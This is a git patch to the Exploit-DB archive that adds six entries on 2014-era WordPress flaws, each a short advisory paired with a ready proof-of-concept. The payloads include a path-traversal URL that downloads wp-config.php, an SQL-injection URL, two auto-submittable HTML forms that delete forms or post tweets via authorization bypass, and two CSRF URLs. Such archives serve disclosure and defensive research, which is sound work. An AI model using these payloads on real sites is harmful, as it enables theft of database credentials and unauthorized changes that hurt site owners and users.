From 5f07a690c4ecff189468242be4a45dbbec2ce81d Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 25 Jan 2016 05:02:02 +0000
Subject: [PATCH] DB: 2016-01-25

6 new exploits
---
 files.csv                        |  6 ++++++
 platforms/php/webapps/39299.txt  |  7 +++++++
 platforms/php/webapps/39300.txt  |  9 +++++++++
 platforms/php/webapps/39301.html | 15 +++++++++++++++
 platforms/php/webapps/39302.html | 18 ++++++++++++++++++
 platforms/php/webapps/39303.txt  |  9 +++++++++
 platforms/php/webapps/39304.txt  |  9 +++++++++
 7 files changed, 73 insertions(+)
 create mode 100755 platforms/php/webapps/39299.txt
 create mode 100755 platforms/php/webapps/39300.txt
 create mode 100755 platforms/php/webapps/39301.html
 create mode 100755 platforms/php/webapps/39302.html
 create mode 100755 platforms/php/webapps/39303.txt
 create mode 100755 platforms/php/webapps/39304.txt

diff --git a/files.csv b/files.csv
index 29150152c..bfb0d8044 100755
--- a/files.csv
+++ b/files.csv
@@ -35539,3 +35539,9 @@ id,file,description,date,author,platform,type,port
 39296,platforms/php/webapps/39296.txt,"WordPress Urban City Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
 39297,platforms/php/webapps/39297.txt,"WordPress Authentic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
 39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
+39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme 'download.php' Arbitrary File Download Vulnerabilitiy",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0
+39300,platforms/php/webapps/39300.txt,"WordPress Spider Facebook Plugin 'facebook.php' SQL Injection Vulnerability",2014-09-07,"Claudio Viviani",php,webapps,0
+39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms Plugin Authorization Bypass Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
+39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin Authorization Bypass Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
+39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
+39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin 'admin.php' Cross Site Request Forgery Vulnerability",2014-09-08,Voxel@Night,php,webapps,0
diff --git a/platforms/php/webapps/39299.txt b/platforms/php/webapps/39299.txt
new file mode 100755
index 000000000..e8ac5af5c
--- /dev/null
+++ b/platforms/php/webapps/39299.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/69673/info
+
+Antioch theme for Wordpress is prone to an arbitrary file-download vulnerability.
+
+An attacker can exploit this issue to download arbitrary files from the web server and obtain potentially sensitive information. 
+
+http://www.example.com/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php 
\ No newline at end of file
diff --git a/platforms/php/webapps/39300.txt b/platforms/php/webapps/39300.txt
new file mode 100755
index 000000000..6fd8d1bdf
--- /dev/null
+++ b/platforms/php/webapps/39300.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/69675/info
+
+Spider Facebook plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Spider Facebook 1.0.8 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-admin/admin.php?page=Spider_Facebook_manage&task=Spider_Facebook_edit&id=1 and 1=2 
\ No newline at end of file
diff --git a/platforms/php/webapps/39301.html b/platforms/php/webapps/39301.html
new file mode 100755
index 000000000..54b1f0207
--- /dev/null
+++ b/platforms/php/webapps/39301.html
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/69740/info
+
+The Ninja Forms Plugin for WordPress is prone to an authorization-bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
+
+Ninja Forms Plugin 2.7.7 is vulnerable; other versions may also be affected. 
+
+<html><body>
+<form action="http://www.example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
+form id: <input name="form_id" value="1"><br>
+action: <input name="action" value="ninja_forms_delete_form">
+<input type="submit" value="submit">
+</form>
+</body></html>
diff --git a/platforms/php/webapps/39302.html b/platforms/php/webapps/39302.html
new file mode 100755
index 000000000..c6f8cc01c
--- /dev/null
+++ b/platforms/php/webapps/39302.html
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/69741/info
+
+WP to Twitter Plugin for WordPress is prone to an authorization-bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.
+
+WP to Twitter 2.9.3 is vulnerable; other versions may also be affected. 
+
+<html><body>
+<form method="post" action="http://www.example.com/wordpress/wp-admin/admin-ajax.php">
+action:<input name="action" value="wpt_tweet"><br>
+tweet action:<input name="tweet_action" value="tweet"><br>
+tweet text: <input value="" name="tweet_text"><br>
+tweet schedule: <input value="undefined+undefined" name="tweet_schedule"><br>
+tweet post id: <input value="1" name="tweet_post_id"><br>
+<input type="submit" value="Submit">
+</form>
+</body></html>
diff --git a/platforms/php/webapps/39303.txt b/platforms/php/webapps/39303.txt
new file mode 100755
index 000000000..4617c21f9
--- /dev/null
+++ b/platforms/php/webapps/39303.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/69744/info
+
+Xhanch My Twitter plugin for WordPress is prone to a cross-site request-forgery vulnerability.
+
+An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
+
+Xhanch My Twitter 2.7.7 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/?xmt_Primary_twt_id=508351521810300928 
\ No newline at end of file
diff --git a/platforms/php/webapps/39304.txt b/platforms/php/webapps/39304.txt
new file mode 100755
index 000000000..524973ed5
--- /dev/null
+++ b/platforms/php/webapps/39304.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/69745/info
+
+W3 Total Cache plugin for WordPress is prone to a cross-site request-forgery vulnerability.
+
+An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.
+
+W3 Total Cache 0.9.4 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-admin/admin.php?page=w3tc_general&w3tc_note=enabled_edge 
\ No newline at end of file